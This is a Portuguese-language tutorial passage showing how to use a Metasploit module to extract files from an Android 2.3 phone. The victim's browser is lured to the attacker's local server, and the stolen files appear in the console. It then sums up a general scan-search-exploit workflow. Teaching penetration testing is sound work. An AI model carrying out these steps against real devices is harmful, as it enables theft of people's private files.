Iremos agora explorar uma vulnerabilidade no sistema
Android. Nesse teste estamos utilizando um aparelho com a versão 2.3 do sistema.
O primeiro passo é pesquisar um exploit para o Android:
search android
Se executarmos o comando:
info auxiliary/gather/android_htmlfileprovider
Veremos que, com esse exploit, é possível extrair arquivos do dispositivo a partir de uma conexão do browser do aparelho com a nossa máquina. O browser deve acessar um link no seguinte formato:
http://ip_da_maquina_local (No meu caso: http://192.168.0.102/)
Ao acessar o link o browser fará o download de um arquivo enviado pelo exploit e, quando o arquivo for aberto, será exibido no console o conteúdo dos arquivos que extraímos do dispositivo.
Vamos então usá-lo:
use auxiliary/gather/android_htmlfileprovider
Se digitarmos:
show options
Veremos as configurações do exploit. Os seguintes parâmetros devem ser configurados (
set < parametros > < valor >):
- SRVHOST :: IP da máquina local
- SRVPORT :: 80
- FILES :: Já estão pré-configurados alguns arquivos que serão extraídos, mas nada impede que configuremos outros arquivos.
Agora basta executar o exploit com o comando:
exploit
Ao acessar o link no dispositivo Android, faremos o download de um arquivo HTML enviado pelo exploit. No Msfconsole veremos então o conteúdo dos arquivos que foram extraídos do dispositivo:
Conclusão
Com o Metasploit, podemos explorar vulnerabilidades em vários tipos de sistemas. Independente do tipo a sequência de passos, na maioria das vezes, obedece um padrão.
Quando não se tem ideia da configuração ou da existência de uma máquina alvo em uma rede, deve-se fazer a varredura de uma faixa de IPs utilizando comandos do
GNU/Linux ou módulos do próprio Metasploit.
Quando se conhece o IP do sistema alvo e suas respectivas portas e serviços associados a estas, basta utilizar o comando
search do Metasploit para encontrar módulos específicos para aquele sistema e serviço.
Módulos novos surgem constantemente no Metaspoit, logo, é aconselhável atualizar a ferramenta periodicamente (digite
msfupdate em um terminal).
É possível também, desenvolver nossos próprios módulos. Procuraremos abordar esta parte de desenvolvimento de módulos em artigos futuros.
Para maiores informações a respeito do Metasploit, acessem o site:
E a comunidade oficial:
Autores: Pedro Braganick, Renan Romero e Lucas Eugênio.